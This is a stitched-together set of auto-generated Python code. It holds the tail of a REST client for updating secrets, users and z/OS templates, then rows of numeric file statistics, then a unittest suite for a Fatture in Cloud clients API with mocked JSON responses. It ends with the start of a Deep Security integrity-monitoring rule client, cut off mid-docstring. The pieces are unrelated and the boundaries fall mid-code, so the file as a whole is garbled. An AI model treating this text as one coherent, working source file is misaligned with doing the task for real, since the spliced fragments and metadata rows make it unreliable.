_request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_secret(self, name, **kwargs): # noqa: E501 """Update an existing secret # noqa: E501 Update an existing secret in the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_secret(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :param SecretValue value: The new value for the secret :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_secret_with_http_info(name, **kwargs) # noqa: E501 else: (data) = self.update_secret_with_http_info(name, **kwargs) # noqa: E501 return data def update_secret_with_http_info(self, name, **kwargs): # noqa: E501 """Update an existing secret # noqa: E501 Update an existing secret in the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_secret_with_http_info(name, async_req=True) >>> result = thread.get() :param async_req bool :param str name: The name of the secret to update (required) :param SecretValue value: The new value for the secret :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['name', 'value'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_secret" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name' is set if self.api_client.client_side_validation and ('name' not in params or params['name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name` when calling `update_secret`") # noqa: E501 collection_formats = {} path_params = {} if 'name' in params: path_params['name'] = params['name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'value' in params: body_params = params['value'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/secret/{name}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_user(self, user, user_file, **kwargs): # noqa: E501 """Update user # noqa: E501 Update user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_user(user, user_file, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_user_with_http_info(user, user_file, **kwargs) # noqa: E501 else: (data) = self.update_user_with_http_info(user, user_file, **kwargs) # noqa: E501 return data def update_user_with_http_info(self, user, user_file, **kwargs): # noqa: E501 """Update user # noqa: E501 Update user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_user_with_http_info(user, user_file, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['user', 'user_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `update_user`") # noqa: E501 # verify the required parameter 'user_file' is set if self.api_client.client_side_validation and ('user_file' not in params or params['user_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user_file` when calling `update_user`") # noqa: E501 collection_formats = {} path_params = {} if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} if 'user_file' in params: local_var_files['userFile'] = params['user_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/{user}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def update_zos_template(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Update z/OS Template # noqa: E501 Update z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_zos_template(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.update_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 else: (data) = self.update_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 return data def update_zos_template_with_http_info(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Update z/OS Template # noqa: E501 Update z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.update_zos_template_with_http_info(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name', 'zos_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_zos_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `update_zos_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `update_zos_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `update_zos_template`") # noqa: E501 # verify the required parameter 'zos_template_data' is set if self.api_client.client_side_validation and ('zos_template_data' not in params or params['zos_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `zos_template_data` when calling `update_zos_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'zos_template_data' in params: body_params = params['zos_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
43.129782
198
0.60602
31,975
278,489
5.041376
0.010852
0.054839
0.021539
0.027693
0.984615
0.978467
0.972165
0.966327
0.960862
0.95691
0
0.017248
0.305685
278,489
6,456
199
43.136462
0.816424
0.318953
0
0.809122
1
0
0.198423
0.051965
0
0
0
0
0
1
0.035191
false
0
0.003097
0
0.090935
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
e805fe377f1f66c13a7265953392f9d531f467da
21,942
py
Python
test/test_clients_api.py
fattureincloud/fattureincloud-python-sdk
f3a40fac345751014ea389680efdaef90f03bac1
[ "MIT" ]
2
2022-02-17T08:33:17.000Z
2022-03-22T09:27:00.000Z
test/test_clients_api.py
fattureincloud/fattureincloud-python-sdk
f3a40fac345751014ea389680efdaef90f03bac1
[ "MIT" ]
null
null
null
test/test_clients_api.py
fattureincloud/fattureincloud-python-sdk
f3a40fac345751014ea389680efdaef90f03bac1
[ "MIT" ]
null
null
null
""" Fatture in Cloud API v2 - API Reference Connect your software with Fatture in Cloud, the invoicing platform chosen by more than 400.000 businesses in Italy. The Fatture in Cloud API is based on REST, and makes possible to interact with the user related data prior authorization via OAuth2 protocol. # noqa: E501 The version of the OpenAPI document: 2.0.9 Contact: info@fattureincloud.it Generated by: https://openapi-generator.tech """ import unittest import unittest.mock import functions import fattureincloud_python_sdk from fattureincloud_python_sdk.rest import RESTResponse from fattureincloud_python_sdk.api.clients_api import ClientsApi from fattureincloud_python_sdk.model.client import Client from fattureincloud_python_sdk.model.client_type import ClientType from fattureincloud_python_sdk.model.default_payment_terms_type import DefaultPaymentTermsType from fattureincloud_python_sdk.model.payment_account import PaymentAccount from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType from fattureincloud_python_sdk.model.payment_method import PaymentMethod from fattureincloud_python_sdk.model.payment_method_details import PaymentMethodDetails from fattureincloud_python_sdk.model.payment_method_type import PaymentMethodType from fattureincloud_python_sdk.model.vat_type import VatType from fattureincloud_python_sdk.model.create_client_response import CreateClientResponse from fattureincloud_python_sdk.model.get_client_response import GetClientResponse from fattureincloud_python_sdk.model.list_clients_response import ListClientsResponse from fattureincloud_python_sdk.model.modify_client_response import ModifyClientResponse class TestClientsApi(unittest.TestCase): """ClientsApi unit test stubs""" def setUp(self): self.api = ClientsApi() def tearDown(self): pass def test_create_client(self): resp = { 'status': 200, 'data': b'{"data": {"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.POST = unittest.mock.MagicMock(return_value = mock_resp) expected = CreateClientResponse(data = Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ) ) actual = self.api.create_client(2) actual.data.id = 2 assert actual == expected def test_delete_client(self): resp = { 'status': 200, 'data': b'{}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.DELETE = unittest.mock.MagicMock(return_value = mock_resp) actual = self.api.delete_client(2, 12345) assert actual == None def test_get_client(self): resp = { 'status': 200, 'data': b'{"data": {"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp) expected = GetClientResponse(data = Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ) ) actual = self.api.get_client(2, 12345) actual.data.id = 2 assert actual == expected def test_list_clients(self): resp = { 'status': 200, 'data': b'{"data": [{"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}, {"id": 2, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}]}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.GET = unittest.mock.MagicMock(return_value = mock_resp) expected = ListClientsResponse(data = [Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ),Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" )] ) actual = self.api.list_clients(2) actual.data[0].id = 2 assert actual == expected def test_modify_client(self): resp = { 'status': 200, 'data': b'{"data": {"id": 1, "code": "123", "name": "Rossi S.r.l.", "type": "company", "first_name": "first_name_example", "last_name": "last_name_example", "contact_person": "contact_person_example", "vat_number": "IT01234567890", "tax_code": "RSSMRA44A12E890Q", "address_street": "Via dei tigli, 12", "address_postal_code": "24010", "address_city": "Bergamo", "address_province": "BG", "address_extra": "address_extra_example", "country": "Italia", "email": "mario.rossi@example.it", "certified_email": "mario.rossi@pec.example.it", "phone": "phone_example", "fax": "fax_example", "notes": "notes_example", "default_vat": {"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}, "default_payment_terms": 30, "default_payment_terms_type": "standard", "default_payment_method": {"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "Conto Banca Intesa", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}, "bank_name": "bank_name_example", "bank_iban": "bank_iban_example", "bank_swift_code": "bank_swift_code_example", "shipping_address": "shipping_address_example", "e_invoice": false, "ei_code": "ei_code_example", "created_at": "created_at_example", "updated_at": "updated_at_example"}}', 'reason': "OK" } mock_resp = RESTResponse(functions.Dict2Class(resp)) mock_resp.getheader = unittest.mock.MagicMock(return_value = None) mock_resp.getheaders = unittest.mock.MagicMock(return_value = None) self.api.api_client.rest_client.PUT = unittest.mock.MagicMock(return_value = mock_resp) expected = ModifyClientResponse(data = Client( id=2, code="123", name="Rossi S.r.l.", type=ClientType("company"), first_name="first_name_example", last_name="last_name_example", contact_person="contact_person_example", vat_number="IT01234567890", tax_code="RSSMRA44A12E890Q", address_street="Via dei tigli, 12", address_postal_code="24010", address_city="Bergamo", address_province="BG", address_extra="address_extra_example", country="Italia", email="mario.rossi@example.it", certified_email="mario.rossi@pec.example.it", phone="phone_example", fax="fax_example", notes="notes_example", default_vat=VatType( id=1, value=22.0, description="Non imponibile art. 123", notes="IVA non imponibile ai sensi dell articolo 123, comma 2", e_invoice=True, ei_type="2", ei_description="ei_description_example", is_disabled=True, ), default_payment_terms=30, default_payment_terms_type=DefaultPaymentTermsType("standard"), default_payment_method=PaymentMethod( id=1, name="name_example", type=PaymentMethodType("standard"), is_default=True, default_payment_account=PaymentAccount( id=1, name="Conto Banca Intesa", type=PaymentAccountType("standard"), iban="iban_example", sia="sia_example", cuc="cuc_example", virtual=True, ), details=[ PaymentMethodDetails( title="title_example", description="description_example", ), ], bank_iban="bank_iban_example", bank_name="bank_name_example", bank_beneficiary="bank_beneficiary_example", ei_payment_method="ei_payment_method_example", ), bank_name="bank_name_example", bank_iban="bank_iban_example", bank_swift_code="bank_swift_code_example", shipping_address="shipping_address_example", e_invoice=False, ei_code="ei_code_example", created_at="created_at_example", updated_at="updated_at_example" ) ) actual = self.api.modify_client(2, 12345) actual.data.id = 2 assert actual == expected if __name__ == '__main__': unittest.main()
171.421875
3,464
0.75016
2,882
21,942
5.377516
0.068702
0.042586
0.025745
0.024519
0.916763
0.904375
0.899471
0.8785
0.872306
0.869273
0
0.025681
0.09671
21,942
127
3,465
172.771654
0.756256
0.021101
0
0.446809
0
0.042553
0.566026
0.153921
0
0
0
0
0.053191
1
0.074468
false
0.010638
0.202128
0
0.287234
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
e82c3ba4a23af698b980feab1f912e2fb70f8906
25,880
py
Python
source/deepsecurity/api/policy_integrity_monitoring_rule_assignments__recommendations_api.py
felipecosta09/cloudone-workload-controltower-lifecycle
7927c84d164058b034fc872701b5ee117641f4d1
[ "Apache-2.0" ]
1
2021-10-30T16:40:09.000Z
2021-10-30T16:40:09.000Z
source/deepsecurity/api/policy_integrity_monitoring_rule_assignments__recommendations_api.py
felipecosta09/cloudone-workload-controltower-lifecycle
7927c84d164058b034fc872701b5ee117641f4d1
[ "Apache-2.0" ]
1
2021-07-28T20:19:03.000Z
2021-07-28T20:19:03.000Z
source/deepsecurity/api/policy_integrity_monitoring_rule_assignments__recommendations_api.py
felipecosta09/cloudone-workload-controltower-lifecycle
7927c84d164058b034fc872701b5ee117641f4d1
[ "Apache-2.0" ]
1
2021-10-30T16:40:02.000Z
2021-10-30T16:40:02.000Z
# coding: utf-8 """ Trend Micro Deep Security API Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501 OpenAPI spec version: 12.5.841 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from deepsecurity.api_client import ApiClient class PolicyIntegrityMonitoringRuleAssignmentsRecommendationsApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def add_integrity_monitoring_rule_ids_to_policy(self, policy_id, api_version, **kwargs): # noqa: E501 """Add Integrity Monitoring Rule IDs # noqa: E501 Assign integrity monitoring rule IDs to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_integrity_monitoring_rule_ids_to_policy(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to add. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_integrity_monitoring_rule_ids_to_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 else: (data) = self.add_integrity_monitoring_rule_ids_to_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 return data def add_integrity_monitoring_rule_ids_to_policy_with_http_info(self, policy_id, api_version, **kwargs): # noqa: E501 """Add Integrity Monitoring Rule IDs # noqa: E501 Assign integrity monitoring rule IDs to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To 